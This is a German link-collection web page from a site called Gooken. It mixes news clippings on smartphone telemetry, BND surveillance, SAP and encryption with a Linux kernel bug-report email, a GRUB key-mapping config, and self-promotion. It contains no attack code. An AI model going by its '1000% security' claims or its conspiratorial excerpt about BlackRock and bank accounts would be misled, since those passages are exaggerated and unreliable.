geben-20-Mal-mehr-Daten-weiter-als-iPhones_183434034.html Android sammelt laut Studie 20-mal mehr Daten als iOS, PC-WELT.de, 03.04.2021 Laut einer Studie soll ein Android-Handy etwa 20-mal so viele Daten wie ein Apple-Smartphone sammeln - aber auch iOS kommt schlecht weg. Schon kurz nach dem Einschalten beginnen Smartphones Daten an Google bzw. Apple zu senden und setzten dies auch im Ruhemodus fort, das ist nicht neu. Wie eine Studie zeigt, gibt es aber offenbar große Unterschiede bei der Datenmenge. In den ersten zehn Minuten überträgt demnach ein Pixel-Smartphone mit Android 10 etwa ein MB an Daten an Googles Server, ein iPhone dagegen nur knapp 42 KB an Daten. Laut Douglas Leith vom Trinity College ist die Art der gesammelten Daten recht ähnlich, vor allem in der Datenmenge bestehe ein großer Unterschied. Vor allem die Google Play Services, Google Play und Youtube sind anscheinend für große Datenmengen verantwortlich. Insgesamt versandte das für den Test verwendete Pixel-Smartphone etwa die zwanzigfache Datenmenge des Test-iPhones. Auch Apple kommt in der Studie nicht gut weg: Die Art der Daten ist bei den beiden getesteten Systemen Android 10 und iOS 13 sehr ähnlich und besteht aus Netzwerkinformationen, Hardware-Daten wie Seriennummer, SIM, Geräte-ID und Telemetriedaten. Bei Letzteren handelt es sich um Protokolldaten, etwa für den Test neuer Systemfunktionen wichtige Daten über Abstürze.iOS fiel außerdem durch eine Besonderheit negativ auf: MAC-Adressen von anderen Geräten im Netzwerk - etwa einem Router - werden inklusive GPS-Adresse an Apple übermittelt, was Rückschlüsse über den Nutzer ermöglicht. Bedenklich finden die Forscher die hohe Frequenz der Datenübertragung, die im Schnitt alle 4,5 Minuten stattfand und auch im Ruhezustand messbar war. Schon durch diese hohe Folge wäre eine Ortung des Nutzers möglich. Für die Überwachung der Datenübertragungen wurden die Test-iPhones, ein iPhone 8 und iPhone 6s per Jailbreak entsperrt. iPhone telefoniert nach Hause - trotz Privatsphäreeinstellungen Deaktivieren könne man die Übertragung dieser Daten bei beiden Systemen nicht. Telemetriedaten würden nämlich auch dann weiter übermittelt, wenn der Nutzer diese Übertragung über die Privatsphäreeinstellungen deaktiviert. Eigentlich kann bei beiden Systemen die Übermittlung von Diagnosedaten untersagen, dies beendet aber nicht die Übermittlung bestimmter Systemdaten. Allgemein habe ein Nutzer laut Studie wenig Eingriffsmöglichkeiten. Es sei zwar möglich, Dienste wie Youtube oder Google Play zu deaktivieren, dies führe aber zu Kompatibilitätsproblemen. https://www.pcwelt.de/news/Android-sammelt-laut-Studie-20-mal-mehr-Daten-als-iOS-11004792.html Verseucht Coronavirus sorgt für Anstieg der Malware-Bedrohungen, trojaner-info.de, 15.06.2020 https://www.trojaner-info.de/aktuelles/feature/coronavirus-sorgt-fuer-anstieg-der-malware-bedrohungen.html https://www.trojaner-info.de/daten-sichern-verschluesseln/aktuelles/malware- verseuchte-lebenslaeufe-und-krankschreibungen-in-umlauf.html Internetknotenpunkt De-Cix Gericht billigt BND-Abhörpraxis, 31.05.2018 Der Internetknotenpunkt De-Cix in Frankfurt ist der größte der Welt. Das macht sich auch der BND zunutze und greift Daten ab. Dagegen hatte der Betreiber geklagt. Nun hat das Bundesverwaltungsgericht geurteilt. Der Bundesnachrichtendienst (BND) darf weiterhin in großem Umfang Daten beim Internet-Knoten De-Cix aus Frankfurt am Main abzapfen. Das entschied nach dpa-Informationen das Bundesverwaltungsgericht. De-Cix (Deutsche Commercial Internet Exchange) hatte gegen den Eingriff des BND geklagt. Dieser überwache ohne konkreten Verdacht. Dabei würde auch rein inländische Telekommunikation beobachtet. Dies lasse das Gesetz zur Beschränkung des Brief-, Post- und Fernmeldegeheimnisses jedoch nicht zu. Es ermächtige lediglich zur überwachung von internationaler Telekommunikation. Richter: BND darf überwachen Dieser Argumentation folgten die Richter nicht und stärkten dem BND mit ihrem Urteil den Rücken. Der Geheimdienst sei berechtigt, auf Anordnung des Bundesinnenministeriums internationale Telekommunikation zu überwachen und aufzuzeichnen. Für den Schutz der Bürger sorgt laut Bundesregierung die G-10-Kommission des Bundestages. Sie muss die Eingriffe in das Fernmeldegeheimnis erlauben. Wie wichtig die Datenüberwachung für den Geheimdienst ist, zeigt eine Äußerung von Ex-Chef Gerhard Schindler: In vertraulicher Runde hatte er gesagt, ohne Fernmeldeaufklärung "kann ich den Laden dichtmachen". Inländische Kommunikation ausgeschlossen Um inländische Kommunikation aus der Überwachung auszuschließen, verwendet der BND laut eigener Auskunft ein mehrdimensionales Filtersystem. Man nehme auch Browser- und Programmeinstellungen mit in den Blick, Geodaten und mehr, um ein Gesamtbild zu bekommen und deutsche Nutzer auszusortieren. Die Filter sollen zu mehr als 99 Prozent wirksam sein. Wenn am Ende immer noch irrtümlich eine E-Mail eines Deutschen durch den Filter rutsche, dann werde sie per Hand entfernt, das komme aber nur selten vor. Anders als von De-Cix behauptet, gebe es deshalb keinen Rechtsbruch. Mehr als sechs Terabyte pro Sekunde Der Frankfurter Knotenpunkt besteht seit 1995. Mit zeitweise mehr als sechs Terabyte pro Sekunde weist er den höchsten Datendurchsatz weltweit auf. Auch ein Großteil des deutschen Internetverkehrs läuft dort hindurch. Aktenzeichen: BVerwG 6 A 3.16 https://www.tagesschau.de/inland/de-cix-bnd-klage-101.html ... eine weitere, sicherlich traurige Ausnahme Nummer drei zu unserem Versprechen "Gooken 1000% - 1000% IT-Sicherheit für Ihren Computer" besteht darin, dass im Code von Webseiten auch nach Deaktivierung der Tracking-Skripte bzw. JavaScripts die Informationen immer noch verteilt und lokal in PHP-MySQL betriebenen Datenbanken aufgenommen werden können. Für Verteilung bedarf es allerdings der eher unüblichen Freigabe des Passworts der Information rein abspeichernder Datenbasen.... Gooken empfiehlt ginlo ( die sichere Messenger-Alternative von der Deutschen Post AG ) "Das Internet muss weg!" Schlecky Silberstein surft in unserer Filterbubble Christian Brandes aka Schlecky Silberstein würde gern das Medium abschaffen, das ihn ernährt. In "Das Internet muss weg" beschreibt der Blogger, wie wir von Algorithmen, Trollen und Tech-Firmen gebrainwasht werden. Aber ist er nicht selbst ein Teil davon? Eine Rezension. https://netzpolitik.org/2018/schlecky-silberstein-surft-in-unserer-filterbubble/ Experte über Privatsphäre: "Ich frage mich ständig, warum die Leute das alles noch mitmachen", STERN.de, 09.06.2019 Marc Al-Hames kennt alle Tricks der Werbeindustrie. Im Gespräch mit dem Stern erklärt er, warum die plötzlichen Datenschutz-Bekenntnisse einiger Konzerne nicht ernstzunehmen sind und was der größte Unterschied zwischen Apple und Google in puncto Datenschutz ist. [...]."Facebook zum Beispiel hat Privatsphäre nie verstanden und versteht sie auch jetzt nicht." [...] "Umfragen zufolge liest der Großteil der Nutzer keine Geschäftsbedingungen und stimmt allen Anfragen zu." https://www.stern.de/digital/online/datenschutz---die-werbe-industrie- kann-uns-ueber-alle-geraete-hinweg-verfolgen--denen-entgeht-nichts--8723748.html "Ich bin noch nie so belogen worden!" #34c3: Die Lauschprogramme der Geheimdienste, netzpolitik.org, 29.01.2018 "Ich bin noch nie so belogen worden", sagte Hans-Christian Ströbele über seine Arbeit im NSA-BND-Untersuchungsausschuss. In einem Gespräch mit Constanze Kurz resümiert der grüne Politiker die Ergebnisse der parlamentarischen Untersuchung. https://netzpolitik.org/2018/34c3-die-lauschprogramme-der-geheimdienste/ Scoring u.a. Sie müssen jetzt aktiv werden: Die finanzielle Übernahme & Ihr Bankkonto - BlackRock, Envestnet/Yodlee und die Federal Reserve, uncut-news.ch, 16.08.2021 Terror/Terrormanagement coreysdigs.com: Haben Sie schon einmal von Yodlee gehört? Ich auch nicht, bis ich entdeckte, dass das Unternehmen meine Daten in meinem Bankkonto sammelt und sie wahrscheinlich an Dritte verkauft. Dies wurde schnell zu einer persönlichen Recherche, bis ich erschütternde Zusammenhänge entdeckte, von denen ich erkannte, dass die Öffentlichkeit darauf aufmerksam gemacht werden muss. Bevor Sie beschließen, dass dies nichts mit Ihnen zu tun hätte, bitte ich Sie dringend, diesen Artikel in seiner Gesamtheit zu lesen und die zeitlichen Abläufe genau zu beachten, denn dies betrifft SIE ALLE, und es wird in mehreren Ländern eingeführt. Ich empfehle Ihnen, sich bei Ihrer Bank zu erkundigen und herauszufinden, welche Drittparteien in Ihre Konten verwickelt sind, und die Möglichkeit in Betracht zu ziehen, Ihre Gelder zu einer kleineren lokalen Bank zu transferieren. Hier geht es nicht nur um Spionage und Datenaggregation, sondern um einen strukturellen Aufbau, der uns in das System der Sozial- und Klimabilanz und noch darüber hinaus bringen soll. Und Biden schreibt die Anordnungen, um den Rahmen zu schaffen, den BlackRock ausgearbeitet hat. Untersuchen Sie Ihre Bank, Finanzinstitute und Ihre Konten Kurze Zusammenfassung Mehr dazu: in Kürze u.a. auf News&Links#Bankenskandal Softwarekonzern SAP Mit Datendiebstahl an die Weltspitze?, tagesschau.de, 12.11.2021 Nach Recherchen von Fakt und dem "Spiegel" könnte der Diebstahl von geistigem Eigentum durch SAP eine lange Tradition haben. Bereits von 1997 bis 2008 soll der Konzern in Kooperation mit Universitäten Entwicklungen von Mitbewerbern missbraucht haben. Neu aufgetauchte interne Dokumente werfen einen düsteren Schatten auf den Softwarekonzern SAP, dessen Management und den Aufsichtsrat. Nach Recherchen des ARD-Magazins Fakt und des "Spiegel" drängt sich das Bild eines Unternehmens auf, das sich offenbar auch mit unlauteren Methoden, vor allem Diebstahl geistigen Eigentums, an die Weltspitze getrickst hat. Die Vorgänge reichen bis zurück in die 1990er-Jahre und sind in einem Gutachten der Wirtschaftskanzlei Linklaters von 2010 festgehalten. In Auftrag gegeben hatte es SAP selbst. Hintergrund war der damalige Rechtsstreit mit Oracle. Der US-Erzrivale hatte SAP 2007 verklagt, weil die Deutschen durch die Übernahme des Softwaredienstleisters TomorrowNow an urheberrechtlich geschützte Dateien von Oracle-Servern herangekommen waren. In einem Vergleich musste SAP später 357 Millionen Dollar Schadenersatz an Oracle zahlen. Im Zentrum steht ein Hopp-Vertrauter Das Linklaters-Gutachten sollte klären, ob Haftungsansprüche gegen den damaligen Vorstand Gerhard Oswald bestehen - Oswald war für die TomorrowNow-Übernahme zuständig. In dem Dokument finden sich zahlreiche Hinweise darauf, dass Oswald und einer seiner Mitarbeiter von Urheberrechtsverletzungen wussten. Zudem soll der damalige SAP-Vorstand unter CEO Henning Kagermann alles gebilligt haben. Die Konzernspitze zog aus dem Gutachten indes keine Konsequenzen. Oswald wurde sogar befördert, obwohl die Linklaters-Juristen empfohlen hatten, sich von ihm "geräuschlos" zu trennen. Oswald, ein Vertrauter von SAP-Gründer und Großaktionär Dietmar Hopp, blieb bis 2016 im Vorstand und sitzt seit 2019 im Aufsichtsrat. Dubiose Kooperation zwischen Uni Mannheim und SAP Fakt und "Spiegel" berichten zudem über eine dubiose Kooperation von SAP mit der Universität Mannheim ab 1997, bei der abermals Oswald eine zentrale Rolle spielte. Auch sie ist Gegenstand des Gutachtens. Offiziell ging es bei der Kooperation darum, Konkurrenzsoftware durch ein unabhängiges Institut untersuchen zu lassen, in diesem Fall die Forschungsgruppe Wirtschaftsinformatik der Uni Mannheim. Tatsächlich hätten SAP-Mitarbeiter unter dem Deckmantel der Kooperation die Konkurrenz ausspioniert. Selbst Interventionen der Rechtsabteilung, des Compliance-Teams und der Revision seien weitgehend ignoriert worden. Nach Informationen von Fakt und "Spiegel" zog SAP bis vor das Bundesverfassungsgericht, um die Staatsanwaltschaft Mannheim daran zu hindern, das Gutachten als Beweis in einem Ermittlungsverfahren gegen die SAP-Vorstände wegen Urheberrechtsverletzungen zu verwenden. Die Beamten waren auf das Dokument 2011 bei einer Razzia in der Konzernzentrale gestoßen. Das höchste deutsche Gericht nahm die Verfassungsbeschwerde seinerzeit nicht an. Das Strafverfahren gegen die Vorstände wurde Ende 2017 eingestellt, SAP musste allerdings 250.000 Euro an die Staatskasse zahlen. SAP teilte auf Anfrage mit, die Urheberrechtsverletzungen von TomorrowNow seien Gegenstand des Verfahrens mit Oracle gewesen, das einvernehmlich beigelegt wurde und abgeschlossen sei. Die Vorgänge rund um die Universität Mannheim seien intern umfassend aufbereitet worden. Der Schutz geistigen Eigentums bilde das Fundament aller SAP-Lösungen. https://www.tagesschau.de/investigativ/mdr/sap-geistiges-eigentum-101.html Geheimdienste/NSA/Überwachung/BigData Edward Snowden: "Wenn sie Verschlüsselungen schwächen, werden Menschen sterben", uncut-news.ch, 24.10.2021 Sie argumentieren, dass Verschlüsselung Kriminelle schützt. Aber sie schützt auch Aktivisten, Dissidenten, verfolgte Gruppen und normale Bürger. Edward Snowden ist einer der prominentesten Nutznießer. Die ersten Nachrichten des Whistleblowers an Journalisten wurden verschlüsselt übertragen. Sie führten zu der Enthüllung, dass Millionen von Amerikanern illegal massenhaft überwacht worden waren. "Wenn man die Verschlüsselung schwächt, werden Menschen sterben", sagte Snowden in einer Erklärung. https://uncutnews.ch/edward-snowden-wenn-sie- verschluesselungen-schwaechen-werden-menschen-sterben/ Von News&Links#Windows und News&Links#NSA&Co. Bündnisse: Five Eyes, Nine Eyes, ... "Wir töten Leute auf der Basis von Metadaten" Hacking und Spionage, netzpolitik.org, 24.02.2020 ... https://netzpolitik.org/2020/ist-whatsapp-sicher-genug-fuer-die-diplomatie/ https://netzpolitik.org/2020/is-whatsapp-safe-for-diplomats/ Linux "Üh, äh, böh: Das ist ja genauso blöd wie Windows!", trojaner-board.de, Linux Forum ... Wir, Gooken, werden Sie hier, genau an dieser Stelle, über den unserer Meinung derzeit leider noch bevorstehenden entscheidenden Kernel-Patch hoffentlich bald unterrichten, Gooken, 12.10.2021: Derzeit aktueller LONGTERMED-kernel: kernel-5.4.249-pclos2023 from PCLinuxOS (pclos), kernel-lt-5.4.219-1.el7.elrepo.x86_64 with perf (el7.elrepo) from Yandex.ru, https://ftp.yandex.ru/elrepo/kernel/el7/x86_64/RPMS/ Liebe Leser, bitte informieren sie den Kernel-Maintainer und linuxfoundation.org, aucn wenn das Problem gelöst wurde! [ UNSOLVED: kernel-5.4.134 and actual kernel-5.4.151: unwanted root-processes got highly active causing many readwrites onto harddisc, whenever starting Pale Moon and tor (rosa2016.1) each surrounded by firejail (OpenSuSE 15.2) E-mail from Gooken to kernel-maintainer Greg Kroah-Hartmann gregkh@linuxfoundation.org and other Linux-kernel-experts Date: 07.24.2021 Subject/Betreff: Unwanted hyperactive root-processes reading and writing out the whole SSD/harddrive ! / Kernel-5.4.134 (pclos) -> Apparmor / Tor (OpenSuSE) usw. etc.: Freigabe von Informationen, Ausführen von Code mit höheren Privilegien und beliebiger Kommandos in Linux, Erzeugung, Lesen und Überschreiben beliebiger Dateien Hi, Greg, dear Linux experts and friends, this is one of the most dangerous and worst things, Linux can happen! Refering to the actual kernel 5.4.134 ( now up to the actual version 5.4.151 and higher, additional remark from 10.08.2021), there still is a problem with root-processes activated running highly active making the tower-LED causing readwrites onto harddiscs making the SSD/harddrive blink serious-madly hard during up to 20 minutes. The whole SSD/harddrive seems to get read out and overwritten! The unwanted, highly by tor (pclos, mga7) resp. firejail activated kernel-root-processes are named kworker/u2:1-kcryptd/253:2 (escpecially this one, CPU: gt; 10%, somtimes over 3600 % measured by ksysguard) kworker/0:1H-kblockd dmcrypt_write/2 and jbd2/dm2--8 Now these processes (that might always get activated) make up the system (of the processes) through their unexpected high activity greater all other ones, even X11/X, making the LED for readwrites of my tower always blink that way! This occurs since kernel around 5.4.134 (and again in 5.4.151), whenever I start browsing (with Pale Moon), activating firejail and tor (el7) too. Both, Pale Moon and tor are always started within firejail. The LED seems to blink (and processes work such active) until tor builds up the connection to a Guard node. Please patch the kernel-5.4 to prevent it in future! Regards Gooken Appendix libapparmor.so.required by firejail (OpenSuSE 15.X) needed by tor (rosa2016.1, mga7) must be the cause for the activation as much as high activity of some root-processes! I have got no other explanation. Kernel security module apparmor itself got deactivated within the kernel by my boot-parameters "security=none" and "apparmor=none". After tor and firejail version got changed from OpenSuSE 15.X to mga7 (firejail) resp. to CentOS el7 (Tor), so that libapparmor.so.1 is not required anymore, such root-processes did not get activated resp. active too much! But they did appear unexectedly again in kernel-5.4.151 ! Restoring Linux with kernel-5.4.150 from my rescuing media (one more 128GB-SSD), this problem disappeared - no such root-processes started. But I do not believe it got really solved by this or generally! So I still await your patches for kernel-5.4. Regards Gooken Thanks a lot for your answer! No, no malware, all is linux (rpm) checked out well, no, nothing can cause it - except - as you wrote - a browser-extension. I do more believe in firejail as the reason. Yes, Pale Moon starts within sandbox firejail and the start envokes tor too. An extension or firejail might be faulty, but why should kernel-root-processes react that way each time Pale Moon gets started? The kernel should find out it itself, not making himself to such threatening jerk, whenever the user just wants to surf in the internet! Regards Gooken 10.27.2021 Hello, today it manages us (Gooken) to prevent the highly active kernel-processes from above after a look into the home-directory of tor (/home/surfuser). There the size of a file increases all the times during the activation of tor surrounded by firejail (that causes the high activity of the kernel-processes), it is named: cached-microdesc-consensus and its size was incredible high (much over 100 MB)! It prevents Tor from building up any connection, so I had to wait up to 20 minutes. Deleting it did not help: This file occured and larges its size again. So we set integrity on it (this file) by "chattr +i" and belonging firejail-rule. Now the problem described next indeed got solved, Tor immediately builds up connections, kernel-processes activity lowered to the current percentage far below 10 percent and the tower-LED for readwrites stopped blinking, but nevertheless this is not really a good solution, tor or firejail and kernel (here 5.4) of course still have to get patched ! ( !!! ) ------------------------ [ UNSOLVED : Linux, all kernel, all LUKS (cryptsetup): Already the login for the mount of the LUKS-encrypted root-partition during the boot each trial fails !, Gooken, 06.06.2022 ] This happens because of the wrong coding of special chars making up the password typed in from keyboard, so that the paragraph sign ("§" might be taken as a "#" and further more. Even the further below mentioned assignments through setkey of such special chars to the meant ones (like paragraph sign for # and further more) in /boot/grub/menu.lst from below, does not help here anyhow! The only thing to get logged into the system for the decryption of the LUKS-encrypted root-partition one can do is typing in the character following such assignments, so that the paragraph sign and further more is understood as they should. So make yourself confident with the character sets from keyboard how they got really get understood by Linux. We hope, this all gets patched one day. /boot/grub/menu.lst: setkey y z setkey z y setkey Y Z setkey Z Y setkey equal parenright setkey parenright parenleft setkey parenleft asterisk setkey doublequote at setkey plus bracketright setkey minus slash setkey slash ampersand setkey ampersand percent setkey percent caret setkey underscore question setkey question underscore setkey semicolon less setkey less numbersign setkey numbersign backslash setkey colon greater setkey greater bar setkey asterisk braceright timeout 10 password --md5 ... default 0 title 008win1smp password --md5 $.../ ... [ UNSOLVED : Kernel-5.10.52 (pclos, PCLinuxOS) causes restarts during the boot of KDE (4.3.4, 4.4.9 and 4.4.11-update-mix out of el6-mdv2010.2-OpenSuSE11.2-kukuk) right before the KDE-welcome-sound is played ] and udev-hotplug does not exist anymore This problem remained unsolved: Using Kernel 5.4, this problem got not solved by us, Gooken. Maybe this kernel gets patched by linuxfoundation in future. Ziel des Exkurs von Gooken "Linux ist sicher", hieß(und heißt) es immer wieder. Doch das traf zumindest de facto fast so wenig zu wie bei anderen Betriebssystemen auch. Linux bedufte (und ggfls. bedarf noch heute) als OpenSource mit in der Tat Sicherheit grundlegend fördenden Dateisystemen noch vielerlei Updates und jeder Menge Einstellungen (Konfigurationen) zur Erlangung der gemeinten, verhießenen Sicherheit. Dafür erforderliche Schritte möchte Ihnen Gooken nun auf empfohlener Lifetime-Hardware vorstellen und mit Ihnen konkret durchgehen! Erzielt wird ein paronoid sicheres Linux ohne größere Einschränkungen für den Benutzer. Sie suchen nach good (sicher anonymisierenden) Tor-nodes (Entry, Middle und Exit-relais)? Wir bieten weiter unten eine Auswahl an. Sie entstammt insbesonders Tor-Relais (Tor-Server) gemeinnütziger eingetragener Vereine und einiger Raspberry Pi. Zugehörige Länder wurden sorgsam nach unserem Teil News&Links (aus dem linken Menü) sorgsam ausgwählt! Zu beachten ist dabei, dass wir, Gooken, allerdings für unsere Auswahl keinerlei Haftung übernehmen. Kommunikation im Netz: Abhörsicher mithilfe der Quantenphysik?, tagesschau.de, 16.12.2018 Wer im Internet miteinander kommuniziert, hinterlässt unweigerlich Spuren. Wiener Forscher wollen jetzt ein Verfahren entwickelt haben, das die Kommunikation auch in einem größeren Netzwerk abhörsicher macht. Die Quantenkryptografie will in Zukunft eine abhörsichere Kommunikation im Internet ermöglichen. Österreichische Forscher haben nun - nach eigenen Angaben - eine wichtige Hürde auf diesem Weg genommen. Ihnen gelang, dass vier Teilnehmer eines Netzwerkes abhörsicher kommuniziert haben. Die Wissenschaftler um Rupert Ursin vom Wiener Institut für Quantenoptik und Quanteninformation der Österreichischen Akademie der Wissenschaften haben ihre Forschung im britischen Fachblatt "Nature" vorgestellt. Nach Angaben der Wissenschaftler lässt sich das Netzwerk einfach erweitern - und könnte so für eine breite Anwendung infrage kommen. Herkömmliche Verschlüsselungstechnologien bieten nur relativen Schutz, sagt Rupert Ursin von der Akademie der Wissenschaften im Gespräch mit dem ORF. "Wenn ich meine E-Mails lese, könnte ein Dritter im Prinzip beliebig viele Kopien davon anfertigen - und es würde niemand bemerken. Bei der Quantenkryptografie ist das unmöglich. Wenn Hacker versuchen, eine Quantenbotschaft zu belauschen, hinterlassen sie unweigerlich eine Spur. Das ist ein Naturgesetz." Die Quantenkryptographie nutzt dabei ein Phänomen der Quantenphysik. Nach deren Regeln können zwei Teilchen einen gemeinsamen Zustand bilden, auch wenn sie anschließend über weite Entfernungen getrennt werden. In diesem Zustand der Verschränkung sind die Eigenschaften der beiden individuellen Teilchen unbestimmt. Wird dann bei einem der beiden Teilchen eine Eigenschaft wie beispielsweise die Schwingungsrichtung gemessen, nimmt das andere Teilchen augenblicklich eine korrespondierende Eigenschaft an. Die Verschränkung endet. Auf diese Weise ist es möglich, abhörsicherer Schlüssel bei Sender und Empfänger zu erzeugen. Lauscher können Anwesenheit nicht verschleiern Entscheidend ist: Der Schlüssel kann von Hackern nicht abgefangen werden. Denn es werden nur einzelne Lichtteilchen (Photonen) ausgetauscht. Und nach den Gesetzen der Quantenphysik ist es unmöglich, den Quantenzustand eines einzelnen Lichtteilchens ohne Fehler zu kopieren. Ein Lauscher kann seine Anwesenheit daher nicht verschleiern und würde sich sofort verraten. Die verschlüsselte Nachricht wird dann auf klassischem Weg ausgetauscht. Bisher nur bei zwei Teilnehmern nachgewiesen Bisher ließen sich auf diese Weise meist jedoch nur zwei Teilnehmer mit einer garantiert abhörsicheren Leitung verbinden. Weitere Verbindungen seien kompliziert, fehleranfällig und mit Kommunikationseinschränkungen behaftet. Das Team versorgte nun vier Teilnehmer aus einer zentralen Quelle mit verschränkten Photonen, sodass alle vier miteinander kryptographische Schlüssel erzeugen und für eine abhörsichere Kommunikation verwenden konnten. "Ein entscheidender Vorteil dieser Architektur ist ihre Flexibilität", betont Ursin in einer Mitteilung der Akademie. "Wir sind damit in der Lage, neue Kommunikationspartner in das Quantennetzwerk zu integrieren - und zwar mit lediglich minimalen Eingriffen. Damit ist gezeigt, dass Quantennetzwerke Realität werden können - für Jedermann." https://www.tagesschau.de/ausland/quanten-101.html [...] ginlo Sicheres Verfahren Ende-zu-Ende-Verschlüsselung ist ein Verfahren, das weit verbreitet Anwendung in alltäglicher Kommunikationstechnologie findet. Seit Jahren schon nutzen Messenger wie Signal, WhatsApp oder iMessage diese Technik. Ende-zu-Ende bedeutet Kommunikationsübertragung ohne Unterbrechung. Übertragene Inhalte können nur an den Endpunkten, also von den jeweiligen Kommunikationspartner:innen, entschlüsselt und ausgelesen werden. Verschlüsselungstechnik ist nichts, über das argumentiert werden kann, sie beruht auf Mathematik und die ist eindeutig. Wie die Kommunikationsanbieter ProtonMail, Threema, Tresorit und Tutanota in ihrem Gegenstatement auf den Punkt bringen: "Der aktuelle Entwurf der Resolution des EU-Ministerrates beruht auf einem eingeschränkten Verständnis der technischen Aspekte von Ende-zu-Ende-Verschlüsselung. Denn Ende-zu-Ende-Verschlüsselung ist absolut, Daten sind entweder verschlüsselt oder nicht. [...] Obwohl bisher noch nichts entschieden ist, raten Datenschützer:innen und Expert:innen dazu aufmerksam zu bleiben. Es ist zwar noch kein Gesetz im Entwurf, die Annahme der Entschließung bereitet jedoch einen Weg für einen Entwurf der Kommission. Die zuständige EU-Innenkommissarin Ylva Johansson äußerte sich zuletzt ambivalent. Zwar teilte sie in einem Schreiben EU-Abgeordneten Anfang Januar mit, dass es keine Pläne gebe, Verschlüsselung zu verbieten. Allerdings fügte die Kommissarin hinzu, "weiterhin gemeinsam mit den Mitgliedstaaten mögliche rechtliche, operative und technische Lösungen für den rechtmäßigen Zugang zu solchen Daten zu prüfen." https://netzpolitik.org/2021/verschluesselung-sichere-kommunikationsanbieter-warnen-vor-hintertueren/ Von trojaner-board.de # Linux: trojaner-board.de, sitemap17.php: BÜÜÜäääääH! Das is ja genau so´n Mist wie Windoof... :( trojaner-board.de, sitemap17.php: Wo ist mein Müll? ... "Thank you, Linux, you have made Microsoft rich!" Hard to install Linux, hard to configure, hard to secure it really up, many updates, not all device drivers, discussable design, changing libraries, unsolved dependencies, missing software for professional business work, ... Debian based on the package-manager dpkg, syncatpic and just the for a long time based awful rare feautered, shaby aptitude, while Mandriva awaits with rpm, urpmi, yum and the user-friendly drakconf for administration ... Wiederum enormer Vorteil des Referenz-"Hochschul-Betriebssystems" UNIX/Linux: Zum Umfang des hervorragend mit Updates aktualisierbaren Open Source zählen neben Anwendungen aller Rubriken, Art und Koleur verschiedenste Arten von Servern (insbesonders httpd/Apache) und Datenbanken (insbesonders MySQL): alles inklusive. 1000% Sicherheit lässt sich erzielen, wie wir hier noch beschreiben werden! System crashed serious hard up to dbus-update from year 2019. KDE caused system breakdowns. It got stable for the first time since a python-update in 2016. A lot of lacks in security and weak points (exploits) had to be solved. Im Unterschied zum insgesamt nun auch recht umfassenden, eine Registrierung erfordendes Debian bietet Gooken eine vollständige, konkrete Sicherheitslösung im Rahmen Linux (Dateisystem) inneliegendem vorgestellten Sicherheitskonzepts und weiterer -konzepte. So kommen neben eigenen zahlreiche Quellen und Links aus dem Internet zu vielen von Debian noch hinzu, während die von Debian bezogenen konkret ausgewertet und umformuliert direkte (konkrete) Anwendung finden. Was Debian selbst angeht, gefiel uns das von den Optionen her einprägsame rpm besser als dpkg wie auch die Paket-Suchmaschine rpmfind.net mit Mirror wie fr2.rpmfind.net in der Struktur und von der ganzen Aufmachung her besser als die zahlreiche Klicks bis zum Download eines Pakets erfordernde und mit Information gewohnt zuschüttende von debian.org. Debian und SuSE sind Linux-Distributionen, die vielleicht alles besser wissen, aber (konkret) nichts besser machen, zumal Konzepte und konkret erforderliche Maßnahmen in der allgemeinen Theorie untergehen. Gooken geht dabei von unter Datenblatt kurz vorgestellter sicherer, preiswerter (exemplarischer) Hardware und dem mit vorzugsweise LUKS/cryptsetup/dm-crypt verschlüsselten Unix-/Linux-Dateisystem (wie ext4, btrfs und reiserfs mit deren nützlichen Eigentums-, Gruppen- und Zugriffrechten) mit seinen konkreten sicherheitstechnischen Möglichkeiten aus. UNIX/Linux ist ein "Kennwortsystem". Die grundsätzliche Idee bei UNIX/Linux ist die Einrichtung eines eigenen paßwortgeschützten Kontos für am besten jedes im Netz kommunzierende Programm (Client oder Server), dessen Abgrenzung (von anderen Konten) bzw. dessen Absicherung mit Zugriffsrechten. Obendrein erfolgt eine Absicherung noch per Programm-Konfiguration (wie z.B. in /etc/httpd.conf für Apache, /etc/squid.conf für Squid und /etc/samba.conf für Samba (LAN)) und mit zahlreichen weiteren, hier noch aufgefürhten Maßnahmen wie insbesonders das Verhindern des Chrootens wie per Systemkonfiguration und mit Sandbox Firejail. Neben generellen Sicherheits-Konfigurationen gilt es noch, die weitreichenden Allround-Rechte für den Systemadministrator root und ähnlich stark bevollmächtigte Konten wie adm zu begrenzen, während die meisten Benutzerkonten sogar ganz gesperrt werden können. Der Begrenzung der "Generalbevollm&aumL;chtigten" dient insbesonders Firewall Linfw3, mit der ab Voreinstellung selbst Systembenutzer root (uid 0 und gid 0) keinen Zugang mehr ins Netz hat. . Ganz konkret auch der (zur Zeit leider noch unvollständige) Online-Check von Gooken zur Überprüfung der erhaltenen Sicherheit des Browsers im Internet. DIN SPEC 3105 Offene DIN-Norm für Offene Hardware Offene Hardware versucht die Potentiale von Open-Source-Prinzipien für Technologieentwicklung auch jenseits von Software zu nutzen. Seit kurzem gibt es einen offiziellen DIN-Standard dafür. Im Interview erklärt Martin Häuer, warum das hilfreich ist und was den Standard besonders macht. https://netzpolitik.org/2020/offene-din-norm-fuer-offene-hardware/ 1000% Sicherheit für den Computer:Linux ist nach unserem Exkurs ein Kennwort-System; 26.05.2020, seit 2010, Enterprise Linux, "Universal Linux": Werden Sie ein für allemal alle Sorgen mit dem Computer los! Rundum-sorglos mit dem Computer, das Ende allen Troubles mit Hard- und Software: (Paranoid-) sicheres Computersystem auf unter Datenblatt aufgeführter TÜV Rheinland geprfüfter Hardware frei von Wartung mit allem Drum und Dran ohne große Einschränkungen, komfortabel, energiesparend, stets (gleichbleibend) mausklick-schnell, abgestimmt, endlos-langlebig (Lifetime-Soft- und Hardware), flächendeckend Software, mit Emulatoren und Virtuelle Maschinen zur internen Emulation anderer Betriebssysteme, total sicher, frei von Lizenzgebühren und alles in allem für (fast) umsonst; präsentiert von Gooken - vorausgesetzt die recht aufwändige Installation des vorgestellten "Universal Linux" unter Update mit Enterprise Linux 6, 7 und/oder 8 gelingt! Derartige in unserem Datenblatt aufgelistete "Lifetime-Hardware" (u.a. das mit nur 19 Volt betriebene Mainboard ASUS ITX-220, vorgestellter TFT von AOC und der DVD-Brenner) weist innerhalb der üblichen Au&szig;entemperatur-Toleranz keinerlei Symptome mehr auf, selbst nicht nach dem schier unendlichen Ein- und Ausschalten und Resetten (Neustarten des Systems) und somit auch nicht diese (wenn wir dafür auch nicht garantieren möchten. Diese 14 Fehler sollten Sie beim PC-Bau vermeiden, PC-WELT.de, 04.07.2020 Sie bauen zum ersten Mal einen PC selbst zusammen: Dann gibt 